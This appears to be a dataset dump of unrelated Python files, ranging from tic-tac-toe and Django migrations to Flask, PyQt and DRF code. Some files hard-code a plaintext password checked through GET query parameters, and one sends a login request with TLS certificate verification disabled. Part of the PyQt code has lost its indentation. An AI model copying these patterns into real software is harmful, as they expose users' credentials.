# Check the columns for a win
def check_columns():
    """Check the five columns for a win; flag game over and return the
    winning mark ("X"/"O"), or None when no column wins."""
    global game_still_going
    # Column c holds indices c, c+5, c+10, c+15, c+20.
    for top in range(5):
        column = [board[top + 5 * step] for step in range(5)]
        if column[0] != "-" and column.count(column[0]) == 5:
            game_still_going = False
            return column[0]
    return None
# Check the diagonals for a win
def check_diagonals():
    """Check both main diagonals for a win; flag game over and return the
    winning mark ("X"/"O"), or None when neither diagonal wins."""
    global game_still_going
    # Top-left to bottom-right, then top-right to bottom-left.
    for cells in ((0, 6, 12, 18, 24), (4, 8, 12, 16, 20)):
        marks = [board[i] for i in cells]
        if marks[0] != "-" and marks.count(marks[0]) == 5:
            game_still_going = False
            return marks[0]
    return None
# Check if there is a tie
def check_for_tie():
    """Return True (and end the game) when the board has no empty cells,
    otherwise return False."""
    global game_still_going
    if all(cell != "-" for cell in board):
        game_still_going = False
        return True
    return False
# Flip the current player from X to O, or O to X
def flip_player():
    """Swap the global ``current_player`` between "X" and "O".

    Any other value is left unchanged, matching the original behaviour.
    """
    global current_player
    current_player = {"X": "O", "O": "X"}.get(current_player, current_player)
current_player = "X"
# ------------ Start Execution -------------
# Play a game of tic tac toe
play_game() |
2,910 | 5cdedce5f984f53b8e26d1580a9040b26023f247 | import shutil
# Report filesystem usage of the root volume, converted to mebibytes.
total, used, free = shutil.disk_usage("/")
print("Total: %d MiB" % (total // (2**20)))
print("Used: %d MiB" % (used // (2**20)))
print("Free: %d MiB" % (free // (2**20)))
from Camera import Camera
import time
import cv2
# Enumerate the attached capture devices and open a Camera per index.
devices = Camera.getDevicesList()
print(devices)
i=0
Cameras = []
for device in devices:
    Cameras.append(Camera(i))
    i=i+1
# NOTE(review): indentation was lost in extraction -- time.sleep(1) may
# belong inside the loop above; confirm against the original file.
time.sleep(1)
print("Ilość kamer: " + str(len(Cameras)))
import threading
### REST
from flask import render_template, Response
from flask import Flask, jsonify
from flask import abort
from flask import request
# NOTE(review): plaintext credentials hard-coded in source -- move to
# configuration / environment variables.
Login = "kamil"
Password = "123"

# Sample in-memory task store backing the demo REST endpoints below.
tasks = [
    {
        'id': 1,
        'title': u'Buy groceries',
        'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',
        'done': False
    },
    {
        'id': 2,
        'title': u'Learn Python',
        'description': u'Need to find a good Python tutorial on the web',
        'done': False
    }
]

restAppi = Flask(__name__)
def gen(task_id):
    """Yield an endless MJPEG multipart stream of frames from camera ``task_id``."""
    while True:
        print("Thread runned " + str(task_id))
        # get camera frame and JPEG-encode it
        img = Cameras[task_id].getImg()
        ret, jpeg = cv2.imencode('.jpg', img)
        frame = jpeg.tobytes()
        # multipart/x-mixed-replace chunk: boundary + content header + payload
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
@restAppi.route('/video_feed/<int:task_id>')
def video_feed(task_id):
    """Stream camera ``task_id`` as an MJPEG multipart HTTP response."""
    return Response(gen(task_id),
                    mimetype='multipart/x-mixed-replace; boundary=frame')
@restAppi.route('/camerasPreview', methods=['GET'])
def camerasPreview():
    """Render the camera preview page for an authenticated user.

    Credentials arrive as GET query parameters and are checked against the
    module-level Login/Password; 401 otherwise.

    Fixes: the original printed the submitted login AND password to stdout
    (leaking secrets into logs) and aliased each value into an unused
    second variable (``category`` / ``content_id``).
    """
    login = request.args.get('login')
    password = request.args.get('password')
    # NOTE(review): credentials in a GET query string end up in access
    # logs and browser history -- consider POST + a session instead.
    if (login == Login) and password == Password:
        return render_template("CamerasPreview.html", name = "Kamil", camerasCount = len(Cameras))
    else: abort(401);
@restAppi.route('/')
def index():
    """Serve the landing page."""
    return render_template("index.html")
@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])
def get_tasks():
    """Return the whole demo task list as JSON."""
    return jsonify({'tasks': tasks})
@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])
def get_task(task_id):
    """Return the single task with the given id as JSON, or abort with 404."""
    found = next((entry for entry in tasks if entry['id'] == task_id), None)
    if found is None:
        abort(404)
    return jsonify({'task': found})
# NOTE(review): restAppiRunned is assigned but never read; kept for
# backwards compatibility with any external reader.
restAppiRunned = False

if __name__ == "__main__":
    # Bug fix: the original used target=restAppi.run(debug=False), which
    # CALLED run() immediately in the main thread and handed its return
    # value (None) to Thread. Pass the callable and its kwargs instead so
    # the server actually runs on the worker thread.
    threading.Thread(target=restAppi.run, kwargs={"debug": False}).start()
|
2,911 | 889d465ceeac57a600b2fa3bd26632edcd90a655 | import sys
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QFont
from PyQt5.QtCore import QCoreApplication
import pymysql
import requests
from twisted.internet import reactor, defer
from scrapy.crawler import CrawlerRunner, CrawlerProcess
from scrapy.utils.project import get_project_settings
from spider.jump_300heroes.jump_300heroes.spiders.my_report import JumpReport
from scrapy.settings import Settings
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from multiprocessing import Process
def db_handle():
    """Open and return a pymysql connection to the local ``heroes`` database."""
    return pymysql.connect(
        host='localhost',
        user='web',
        passwd='web',
        charset='utf8',
        database='heroes',
    )
class Example(QWidget):
    """Main window: queries 300heroes player stats (scrapy crawl + MySQL)
    and shows them in text panes and a match table."""

    class A(QWidget):
        """Minimal secondary window opened when a match row is inspected."""

        def __init__(self):
            super().__init__()
            self.initUI()

        def initUI(self):
            # fixed-size placeholder window with an icon
            self.setGeometry(300, 300, 300, 220)
            self.setWindowTitle('Icon')
            self.setWindowIcon(QIcon('web.png'))
            self.show()
def __init__(self):
    """Build the widget tree and show the main window."""
    super().__init__()
    self.initUI()
def initUI(self):
    """Create the query controls, result panes and the match table,
    lay them out in a grid and show the window."""
    # name entry; defaults to a sample player name
    self.qle = QLineEdit("蔽月八云")
    self.user = self.qle.text()
    self.para = "user={}".format(self.user)
    print(self.user, '1')
    # "查询" = search button; triggers the crawl + DB refresh
    btn = QPushButton('查询', self)
    btn.resize(btn.sizeHint())
    btn.clicked.connect(self.search)
    self.txt = QTextEdit()
    self.battle = QTextEdit()
    self.player_status = QTextEdit()
    self.create_table()
    # The action name must not be "Quit"/"Exit" or it is not displayed;
    # cause unknown (original author's observation).
    exitAction = QAction('Exit', self)
    exitAction.setShortcut('Ctrl+Q')
    exitAction.setStatusTip('application')
    exitAction.triggered.connect(qApp.quit)
    grid = QGridLayout()
    grid.setSpacing(10)
    grid.addWidget(self.qle, 1, 0)
    grid.addWidget(btn, 2, 0)
    grid.addWidget(self.txt, 3, 0)
    grid.addWidget(self.battle, 1, 1, 3, 1)
    grid.addWidget(self.player_status, 4, 0, 2, 2)
    grid.addWidget(self.battle_table, 6, 0, 2, 2)
    self.setLayout(grid)
    self.setGeometry(600, 600, 800, 600)
    self.center()
    self.setWindowTitle("战绩查询")
    self.show()
def create_table(self):
    """Create the match-history table widget (8 fixed columns; the row
    count is set later when data is loaded)."""
    self.battle_table = QTableWidget()
    # column count is fixed; rows are added when data is read
    self.battle_table.setColumnCount(8)
    # header labels
    self.battle_table.setHorizontalHeaderLabels(
        ['match_id', 'head', 'date', 'time', 'kill_count', 'death', 'support', 'score'])
    # alternate row colours
    self.battle_table.setAlternatingRowColors(True)
    # select whole rows on click
    self.battle_table.setSelectionBehavior(QAbstractItemView.SelectRows)
    # resize rows to fit their contents
    self.battle_table.resizeRowsToContents()
    # double-click opens the match details
    self.battle_table.doubleClicked.connect(self.on_click)
@pyqtSlot()
def on_click(self):
    """Open the match-details dialog for the double-clicked row."""
    currentQTableWidgetItem = self.battle_table.selectedItems()[0]
    # With row selection the first selected item is the match_id column.
    #match_id = self.battle_table.item(currentQTableWidgetItem.row(), 0).text()
    match_id = currentQTableWidgetItem.text()
    print(match_id)
    self.showDialog(match_id)
def showDialog(self, match_id):
    """Fetch match details for ``match_id`` and open the secondary window.

    NOTE(review): the HTTP response is fetched but never used, and the
    A() instance is unreferenced afterwards -- this method looks
    unfinished (the original also carried commented-out crawler code).
    """
    data = requests.get('http://300report.jumpw.com/api/getmatch?id={}'.format(match_id))
    a = self.A()
def searchd(self):
    # NOTE(review): appears to be an abandoned multiprocessing variant of
    # search(). ``self.a`` is not defined anywhere in this class, so the
    # Process target would raise AttributeError; the __name__ guard inside
    # a method is also unusual. Confirm intent before using.
    if __name__ == '__main__':
        #print(user, '2')
        p = Process(target=self.a)
        p.start()
        p.join()
def search(self):
    """Run the scrapy crawl for the entered player, then refresh all panes
    from the MySQL ``heroes`` database.

    Blocks the UI while the crawl runs (reactor.run() is synchronous).

    Fixes: the three SQL statements were built with str.format() on user
    input (SQL injection through the name field); they now use
    parameterized queries. Large blocks of commented-out experiments were
    removed.
    """
    print(self.user)
    print(__name__)
    # Run the spider in-process; reactor.run() blocks until the crawl and
    # the reactor shutdown (addBoth) complete.
    runner = CrawlerRunner(get_project_settings())
    print('a')
    runner.crawl('JumpReport', user=self.user)
    print(self.user)
    d = runner.join()
    d.addBoth(lambda _: reactor.stop())
    reactor.run()
    print("complete")
    name = self.qle.text()
    db = db_handle()
    with db as con:
        # Parameterized query instead of str.format() interpolation.
        con.execute(
            "select * from player where name = %s order by update_time", (name,)
        )
        player = con.fetchone()
        if player:
            # NOTE(review): unpacking rebinds `name` (and shadows the
            # builtin `id`), matching the original behaviour.
            id, name, win, match_count, strength, level, update_time, rank = player
            text = "角色名: {}\n胜场: {}\n总场数: {}\n团分: {}\n团分排行: {}\n等级: {}\n更新时间: {}".format(
                name, win, match_count, strength, rank, level, update_time)
            self.txt.setText(text)
        con.execute(
            "select * from player_data where name = %s order by date", (name,)
        )
        player_data = con.fetchall()
        a = ""
        for data in player_data:
            a += str(data)
            a += "\n"
        self.battle.setText(str(a))
        con.execute("select * from game_data order by match_id desc")
        game_data = con.fetchall()
        a = ""
        l = 0
        self.battle_table.setRowCount(len(game_data))
        for data in game_data:
            a += str(data[1:])
            print(type(data))
            for i in range(self.battle_table.columnCount()):
                item = QTableWidgetItem(str(data[i + 1]))
                # centre the cell text horizontally and vertically
                item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
                self.battle_table.setItem(l, i, item)
            a += "\n"
            self.player_status.setText(str(a))
            l += 1
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', "Quit?", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
class BatterReport(QWidget):
    """Placeholder window for battle reports."""
    def __init__(self):
        super().__init__()
        self.initUI()
    def initUI(self):
        # NOTE(review): the text edit is created but never added to a layout
        # or shown -- looks unfinished; confirm intent.
        self.txt = QTextEdit()
if __name__ == '__main__':
    # Standard Qt bootstrap: build the application, show the main window,
    # and block in the event loop until it exits.
    app = QApplication(sys.argv)
    ex = Example()
    sys.exit(app.exec_())
|
2,912 | 34947b7ed300f2cbcbf9042fee3902458921d603 | a = list(range(1,501))
b = list(range(1, 501))
c = list(range(1, 501))  # kept for compatibility; k is now derived instead of scanned
# Find the Pythagorean triple with i + j + k == 1000 and i < j < k.
# k is fully determined by i and j (k = 1000 - i - j), so a double loop
# replaces the original O(n^3) triple scan; output is unchanged.
for i in a:
    for j in b:
        k = 1000 - i - j
        if i < j < k and k <= 500 and i**2 + j**2 == k**2:
            print(i)
            print(j)
            print(k)
|
2,913 | 6e56c7792d88385cc28c48a7d6dd32b9d6917c64 | # Generated by Django 2.1.7 on 2019-03-24 07:08
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: renames District.District to the conventional
    lowercase `district`."""

    dependencies = [
        ('adminsite', '0005_auto_20190324_0706'),
    ]
    operations = [
        migrations.RenameField(
            model_name='district',
            old_name='District',
            new_name='district',
        ),
    ]
|
2,914 | fab3e524edf6783775fabf402f9148bf31ac06d6 | import smtplib
from email.message import EmailMessage
from functools import wraps
from threading import Thread
import flask_login
from flask import flash, current_app
from togger import db
from togger.auth.models import User, Role
from togger.calendar.models import Calendar
def get_user(username):
    """Look up an account by username; None when missing or username is None."""
    if username is None:
        return None
    return User.query.filter(User.username == username).first()
def get_user_by_id(id):
    """Look up an account by its public alias id; None when missing."""
    if id is None:
        return None
    return User.query.filter(User.alias_id == id).first()
def add_user(username, password, first_name, last_name):
    """Create an account with its own calendar and an OWNER role.

    Sends a verification email before committing; returns the new User,
    or None when username or password is missing.
    """
    if username is None or password is None:
        return
    # Every account starts with a personal calendar it owns by default.
    calendar = Calendar(name=username)
    role = Role(type=Role.OWNER, calendar=calendar, is_default=True)
    user = User(username=username, first_name=first_name, last_name=last_name, roles=[role])
    user.set_password(password)
    verify_email(user)
    db.session.add(user)
    db.session.commit()
    return user
def update_user(first_name, last_name):
    """Update the signed-in user's display name; always returns True."""
    user = flask_login.current_user
    user.first_name = first_name
    user.last_name = last_name
    db.session.merge(user)
    db.session.commit()
    return True
def verify_email(user):
    """Email *user* a link containing a fresh email-validation token."""
    token = user.generate_validate_token()
    url = current_app.config['APP_URL'] + "/auth/verify/" + token
    subject = "[Togger] Welcome to Togger. Verify your email"
    # The link itself is the message body.
    prepare_email(user.username, subject, url)
def restore_password(token, new_password):
    """Reset the password from a restoration-link token and sign the user in.

    Returns True on success; False (with a flash) on an expired token.
    """
    user = User()
    # check_password_token presumably populates user.username from the
    # token payload when valid -- TODO confirm against User's implementation.
    if user.check_password_token(token):
        user = get_user(user.username)
        user.set_password(new_password)
        db.session.merge(user)
        db.session.commit()
        flask_login.login_user(user, remember=True)
        return True
    else:
        flash("Restoration link got expired. Please request a new one.", 'danger')
        return False
def password_email(username):
    """Send a password-restoration link, but only to verified accounts.

    Silently does nothing for unknown or unverified users (avoids leaking
    which addresses exist).
    """
    user = get_user(username)
    if user and user.is_verified:
        token = user.generate_password_token()
        url = current_app.config['APP_URL'] + "/auth/restore/" + token
        subject = "[Togger] Forgot your password? The restoration link is inside"
        prepare_email(user.username, subject, url)
def prepare_email(address, subject, content):
    """Send an email asynchronously on a daemon thread.

    The app config is captured here because current_app is not available
    inside the worker thread.
    """
    thread = Thread(target=send_email,
                    args=(address, subject, content, current_app.config,))
    thread.daemon = True
    thread.start()
def send_email(username, subject, content, config):
    """Deliver a plain-text email through the configured SMTP relay.

    Runs on a background thread (see prepare_email), so *config* is passed
    in explicitly rather than read from flask's current_app.
    """
    msg = EmailMessage()
    msg.set_content(content)
    msg['Subject'] = subject
    msg['From'] = config['SMTP_MAILBOX']
    msg['To'] = username
    # Context manager closes the connection (calls quit) even when login or
    # send raises; the original leaked the socket on failure.
    with smtplib.SMTP(config['SMTP_SERVER'], config['SMTP_PORT']) as s:
        s.login(config['SMTP_LOGIN'], config['SMTP_PASSWORD'])
        s.send_message(msg)
def confirm_verify_email(token):
    """Mark the account referenced by a verification token as verified.

    Flashes an error on an expired/invalid token instead of raising.
    """
    user = User()
    # check_validate_token presumably fills user.username from the token
    # payload when valid -- TODO confirm against User's implementation.
    if user.check_validate_token(token):
        user = get_user(user.username)
        user.is_verified = True
        db.session.merge(user)
        db.session.commit()
    else:
        flash('Verification link got expired. Please request a new one.', 'danger')
def change_password(old_password, new_password):
    """Change the current user's password after re-checking the old one.

    Returns True on success, False when the old password does not match;
    flashes feedback either way.
    """
    if flask_login.current_user.check_password(old_password):
        flask_login.current_user.set_password(new_password)
        db.session.merge(flask_login.current_user)
        db.session.commit()
        flash('Password was changed. Please sign in using new password.', 'success')
        return True
    flash('Current password is incorrect.', 'danger')
    return False
def get_roles():
    """Roles of the signed-in user; [] for anonymous sessions (which lack
    a .roles attribute)."""
    user = flask_login.current_user
    try:
        return user.roles
    except AttributeError:
        return []
def get_role():
    """Return the user's default role, or None when no role is marked default."""
    return next((role for role in get_roles() if role.is_default), None)
def has_role(role_type):
    """View decorator: require the user's default role to be at least
    *role_type* (role types compare numerically), else return the login
    manager's unauthorized response."""
    def decorator(function):
        @wraps(function)
        def wrapper(*args, **kwargs):
            role = get_role()
            if role and role.type >= role_type:
                result = function(*args, **kwargs)
            else:
                result = current_app.login_manager.unauthorized()
            return result
        return wrapper
    return decorator
|
2,915 | b7a8e4105f1c1c532eaae27afae14e9a4f2ddfba | # Generated by Django 3.2.3 on 2021-06-19 11:27
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial auto-generated migration: creates the BillDetail table."""

    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='BillDetail',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Name', models.CharField(default=None, max_length=150)),
                # CID is the unique customer/connection identifier.
                ('CID', models.IntegerField(unique=True)),
                ('Units', models.PositiveIntegerField(default=None, validators=[django.core.validators.MaxValueValidator(100)])),
                ('Amount', models.PositiveIntegerField(default=None, validators=[django.core.validators.MaxValueValidator(100)])),
                ('BillGenerated', models.DateField(auto_now_add=True)),
            ],
        ),
    ]
|
2,916 | 44cbe1face91d3ac7edcd93d0b470bce90c8b674 | # myapp/serializers.py
from rest_framework import serializers
from rest_framework.authtoken.models import Token
from .models import *
# Serializers define the API representation.
class GeneralSerializer(serializers.ModelSerializer):
    """Generic all-fields serializer; callers set Meta.model at runtime."""
    class Meta:
        model = None
        fields = '__all__'
class V2OfUsersSerializer(serializers.HyperlinkedModelSerializer):
    """Registration serializer for user accounts."""
    class Meta:
        model = V2OfUsers
        fields = ('firstname', 'lastname', 'username', 'email', 'password')
        # Never echo the password back in API responses.
        extra_kwargs = {'password': {'write_only': True}}
    def create(self, validated_data):
        # NOTE(review): Meta.model is V2OfUsers but this constructs `User`
        # (via `from .models import *`) and ignores firstname/lastname --
        # confirm this mismatch is intentional.
        user = User(
            email=validated_data['email'],
            username=validated_data['username']
        )
        user.set_password(validated_data['password'])
        user.save()
        # Issue a DRF auth token immediately so the client can sign in.
        Token.objects.create(user=user)
        return user
class MeasurementsSerializer(serializers.ModelSerializer):
    """Measurements serializer with optional field filtering via the
    request's `?fields=a,b,c` query parameter."""
    class Meta:
        model = Measurements
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        super(MeasurementsSerializer, self).__init__(*args, **kwargs)
        request = self.context.get("request")
        if request and request.query_params.get('fields'):
            fields = request.query_params.get('fields')
            if fields:
                fields = fields.split(',')
                allowed = set(fields)
                existing = set(self.fields.keys())
                # Drop every declared field the client did not ask for.
                for field_name in existing - allowed:
                    self.fields.pop(field_name)
# Serializer for Counting Providers
# and Network Type e.g 2G, 3G, 4G
class CountSerializer(serializers.Serializer):
    """Key/value pair for aggregate counts (providers, network types)."""
    key = serializers.CharField(max_length=20)
    value = serializers.IntegerField()
# Serializer for Mobile Operating System
class OperatingSystemSerializer(serializers.ModelSerializer):
    """Count per mobile OS version; exposes `versionname` as `key`."""
    value = serializers.CharField(max_length=30)
    key = serializers.CharField(source='versionname', max_length=30)
    class Meta:
        model = Measurements
        fields = ('key', 'value')
# Serializer for Vendors
class VendorsSerializer(serializers.ModelSerializer):
    """Count per device vendor; exposes `devicemanufacturer` as `key`."""
    value = serializers.CharField(max_length=30)
    key = serializers.CharField(source='devicemanufacturer', max_length=30)
    class Meta:
        model = Measurements
        fields = ('key', 'value')
# General Serializer for DownLink and UpLink for all
# Providers and Network Types with date range parameters
class GlobalSerializer(serializers.Serializer):
    """Downlink/uplink aggregate (avg/min/max) keyed by provider or network
    type, optionally over a date range."""
    key = serializers.CharField(max_length=20)
    avg = serializers.IntegerField()
    min = serializers.IntegerField()
    max = serializers.IntegerField()
|
2,917 | 2a37d02c7a0840e855a80adced4794fd757e353a | import ssl
import urllib
from urllib import request, response, error, parse, robotparser
# SECURITY NOTE(review): certificate verification is disabled for this
# request -- acceptable only for throwaway scraping, never for real logins.
context = ssl._create_unverified_context()
url = 'https://oauth.51job.com/get_login.php?client_id=000001&redirect_uri=https%3A%2F%2Funion.yingjiesheng.com%2Fapi_login.php&from_domain=yjs_web&display=default&state=7c893ec1be7b355a91bdc3c474087add--368ba30db1d6217cc18f7dfe0bd27a79&partner='
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
# Pre-encrypted credentials captured from the site's login form.
data = {
    'loginname_encrypt': '/Pjp1Ki1S3j65+QC2J2pkg==',
    'password_encrypt': 'hiqxe1qVXCoVuCrSwYM+eg=='
}
# POST the form-encoded payload and print the raw response body.
data = bytes(parse.urlencode(data), 'utf-8')
req = request.Request(url, data=data, headers=headers, method='POST')
res = request.urlopen(req, context=context)
print(res.read().decode('utf-8'))
2,918 | 5433e75bdc46d5a975969e7ece799174dc9b8713 | # # 8/19/2020
# Of course, binary classification is just a single special case. Target encoding could be applied to any target variable type:
# For binary classification usually mean target encoding is used
# For regression mean could be changed to median, quartiles, etc.
# For multi-class classification with N classes we create N features with target mean for each category in one vs. all fashion
# The mean_target_encoding() function you've created could be used for any target type specified above. Let's apply it for the regression problem on the example of House Prices Kaggle competition.
# Your goal is to encode a categorical feature "RoofStyle" using mean target encoding. The train and test DataFrames are already available in your workspace.
# Create mean target encoded feature
# NOTE(review): `train`, `test` and `mean_target_encoding` come from the
# DataCamp exercise workspace; this snippet is not runnable standalone.
train['RoofStyle_enc'], test['RoofStyle_enc'] = mean_target_encoding(train=train,
                                                                     test=test,
                                                                     target='SalePrice',
                                                                     categorical='RoofStyle',
                                                                     alpha=10)
# Look at the encoding
print(test[['RoofStyle', 'RoofStyle_enc']].drop_duplicates())
# <script.py> output:
# RoofStyle RoofStyle_enc
# 0 Gable 171565.947836
# 1 Hip 217594.645131
# 98 Gambrel 164152.950424
# 133 Flat 188703.563431
# 362 Mansard 180775.938759
# 1053 Shed 188267.663242
|
2,919 | db159cfb198311b0369f65eb9e10947c4d28c695 | #finding optimal betting strategy for the blackjack game using Monte Carlo ES method
import random
class Player():
    """Blackjack player state for Monte Carlo ES.

    Tracks the player's card total and the dealer's visible card;
    q/policy/returns are placeholders for the action-value table, the
    policy, and the sampled returns.
    """
    def __init__(self) -> None:
        # Bug fix: the original assigned these to *locals*, so the instance
        # attributes were never created and hit() would raise AttributeError
        # before the first deal().
        self.q = None
        self.policy = None
        self.returns = None
        self.cards = 0
        self.dealer = 0
    def hit(self):
        """Draw one card (1-11) and add it to the player's total."""
        self.cards += random.randint(1, 11)
    def deal(self):
        """Start a hand: two cards for the player, one visible dealer card."""
        self.cards = random.randint(1, 11) + random.randint(1, 11)
        self.dealer = random.randint(1, 11)
    def stick(self):
        """Stop drawing cards; intentionally a no-op."""
        pass
    def reset(self):
        """Clear both totals ahead of a new episode."""
        self.dealer = 0
        self.cards = 0
    def episode(self):
        """Begin a fresh episode; policy-driven action selection is TODO."""
        self.reset()
        self.deal()
        #take action based on policy
#Initialize, for all s ∈ S, a ∈ A(s):
#Q(s, a) ← arbitrary
#π(s) ← arbitrary
#Returns(s, a) ← empty list
#Repeat forever:
#Choose S0 ∈ S and A0 ∈ A(S0) s.t. all pairs have probability > 0
#Generate an episode starting from S0, A0, following π
#For each pair s, a appearing in the episode:
#G ← return following the first occurrence of s, a
#Append G to Returns(s, a)
#Q(s, a) ← average(Returns(s, a))
#For each s in the episode:
#π(s) ← argmaxa Q(s, a)
if __name__=="__main__":
    # Entry point intentionally empty: the training loop (see the sketch in
    # the comments above) is not implemented yet.
    pass
|
2,920 | 6a4585e0e2f5ebbd0f9a7fa203f76bb88ff9c2a0 | from django.apps import AppConfig
class ProjectrolesConfig(AppConfig):
    """Django app configuration for the projectroles app."""
    name = 'projectroles'
|
2,921 | 50a5d3431693b402c15b557357eaf9a85fc02b0b | # -*- coding: utf-8 -*-
import sys, io,re
import regex
from collections import defaultdict
import datetime
import json
def update_key(data_base, url,kkey):
    """Append *kkey* to the <key> tag list stored for *url* if absent.

    Returns True when the key was added, False when already present.
    """
    keys_saved = regex.get_data('<key>\s(.+?)\s<',data_base[url]['key'])
    if kkey not in keys_saved:
        # Strip the trailing newline, append the new tag, restore newline.
        data_base[url]['key'] = data_base[url]['key'][:-1]
        data_base[url]['key'] += ' <key> ' + kkey + ' <\key>\n'
        return True
    return False
def check_date(data_base, key_word):
    """Find the most recent YYYY-MM-DD value stored under *key_word* and
    return the day before it as an int in YYYYMMDD form.

    Non-date values under the key are skipped (as before); returns 0 when
    no parsable date exists.
    """
    latest = 0
    for url in data_base:
        for key in data_base[url]:
            if key != key_word:
                continue
            try:
                candidate = int(re.sub(r'-', '', data_base[url][key]))
            except ValueError:
                continue
            latest = max(latest, candidate)
    if latest == 0:
        return 0
    # Parse the 8-digit stamp directly: int() already handles leading
    # zeros, so the original's month/day leading-zero branches were
    # redundant.
    stamp = str(latest)
    latest_date = datetime.date(int(stamp[:4]), int(stamp[4:6]), int(stamp[6:8]))
    previous_day = (latest_date - datetime.timedelta(1)).isoformat()
    return int(re.sub(r'-', '', previous_day))
def load_keywords_info():
    """Load the keyword cache from keywords.json.

    Returns an empty defaultdict(str) when the file is missing or holds
    invalid JSON, so callers can always index the result.
    """
    try:
        with open('keywords.json', 'r') as fp:
            return json.load(fp)
    except (FileNotFoundError, json.decoder.JSONDecodeError):
        # A missing file previously raised; treat it like an empty cache,
        # consistent with load_previous().
        return defaultdict(str)
def save_keywords_info(data):
    """Persist the keyword cache to keywords.json (overwrites)."""
    with open('keywords.json', 'w') as fp:
        json.dump(data, fp)
def load_url_info():
    """Load the URL cache from urls.json.

    Returns an empty defaultdict(list) when the file is missing or holds
    invalid JSON, so callers can always append to entries.
    """
    try:
        with open('urls.json', 'r') as fp:
            return json.load(fp)
    except (FileNotFoundError, json.decoder.JSONDecodeError):
        # A missing file previously raised; treat it like an empty cache,
        # consistent with load_previous().
        return defaultdict(list)
def save_url_info(data):
    """Persist the URL cache to urls.json (overwrites)."""
    with open('urls.json', 'w') as fp:
        json.dump(data, fp)
def load_previous(data_base):
    """Populate *data_base* (mapping key -> list of urls) from news.bank.

    The file stores fixed 10-line records; line i+1 holds the key and line
    i+4 the url, both wrapped in `> ... <` markers.  Missing file is treated
    as an empty archive.
    """
    previous = []
    try:
        # NOTE(review): file handle is never closed -- consider `with`.
        file = open("news.bank","r",encoding='utf8');
        for line in file:
            previous.append(line)
        i = 0
        while i < len(previous):
            url = regex.get_data('>\s(.+?)\s<',previous[i+4])[0]
            key = regex.get_data('>\s(.+?)\s<',previous[i+1])[0]
            #date = regex.get_data('>\s(.+?)\s<',previous[i+5])[0]
            data_base[key].append(url)
            #data_base[url][key] = date
            #data_base[url] = defaultdict(str)
            #data_base[id]['id'] = previous[i]
            #data_base[key]['key'] = previous[i]
            #data_base[url]['title'] = previous[i+1]
            #data_base[url]['source'] = previous[i+2]
            #data_base[url]['url'] = previous[i+3]
            #data_base[url]['date'] = previous[i+4]
            #data_base[url]['author'] = previous[i+5]
            #data_base[url]['content1'] = previous[i+6]
            #data_base[url]['content2'] = previous[i+7]
            # Advance to the next 10-line record.
            i += 10
    except FileNotFoundError:
        pass
def check_last_update(url, date):
    """Return the index of the first URL whose embedded yyyy/mm/dd stamp is
    older than *date* (an int in YYYYMMDD form), or -1 when none is."""
    for index, entry in enumerate(url):
        stamp = regex.get_data('\S+\/(\d+\/\d+\/\d+)\S+', entry)[0]
        if int(re.sub(r'/', '', stamp)) < date:
            return index
    return -1
def MinEditDist(s1, s2):
    """Levenshtein distance between *s1* and *s2* (insert/delete/substitute,
    unit cost), computed row by row in O(min(m, n)) space."""
    # Keep the shorter string as the row dimension to minimise memory.
    if len(s1) > len(s2):
        s1, s2 = s2, s1
    previous_row = list(range(len(s1) + 1))
    for row_idx, ch2 in enumerate(s2, start=1):
        current_row = [row_idx]
        for col_idx, ch1 in enumerate(s1):
            if ch1 == ch2:
                cost = previous_row[col_idx]
            else:
                cost = 1 + min(previous_row[col_idx],
                               previous_row[col_idx + 1],
                               current_row[-1])
            current_row.append(cost)
        previous_row = current_row
    return previous_row[-1]
|
2,922 | c6fd848bb3d845a50b928c18a51f296a500e7746 | import socket
def main():
    """Open a TCP connection to localhost:8886 and send the payload "TCP"."""
    server_address = ('localhost', 8886)
    # Context manager guarantees the socket is closed even if connect or
    # send raises; the original leaked it.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect(server_address)
        data = "TCP"
        # str.encode already yields the byte sequence sendall expects;
        # the original's manual bytearray copy loop was redundant.
        sock.sendall(data.encode("utf-8"))

if __name__ == '__main__':
    main()
|
2,923 | ccedca543fc4dee284a9243317d028ffdeac229d | import pandas
import numpy as np
# Load the Kaggle "Ghouls, Goblins, and Ghosts" train/test splits.
train_set = pandas.read_csv("./dataset/train.csv")
test_set = pandas.read_csv("./dataset/test.csv")
print(train_set)
train_set = train_set.drop('id',axis=1)
print(train_set.describe())
# Encode the string target as integer codes; keep the code->label mapping
# to translate predictions back at submission time.
train_set['type'], categories = train_set['type'].factorize()
import matplotlib.pyplot as plt
print(train_set.info())
'''
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
cax = ax.matshow(train_set.corr())
fig.colorbar(cax)
ax.set_xticklabels(train_set.columns)
ax.set_yticklabels(train_set.columns)
plt.show()'''
X_train = train_set.drop('type',axis=1)
y_train = train_set.get('type')
# Stack test rows under train so both go through one preprocessing pass;
# they are split back apart after the pipeline (rows 0-370 are train).
X_train= X_train.append(test_set)
#print(X_train.info())
from sklearn.base import BaseEstimator, TransformerMixin
class CreateExtraFeatures(BaseEstimator,TransformerMixin):
    """Stateless transformer adding two interaction features
    (hair_length*has_soul and rotting_flesh*has_soul) and returning the
    frame as a plain ndarray."""
    def __init__(self):
        pass
    def fit(self, X, y=None):
        # Nothing to learn.
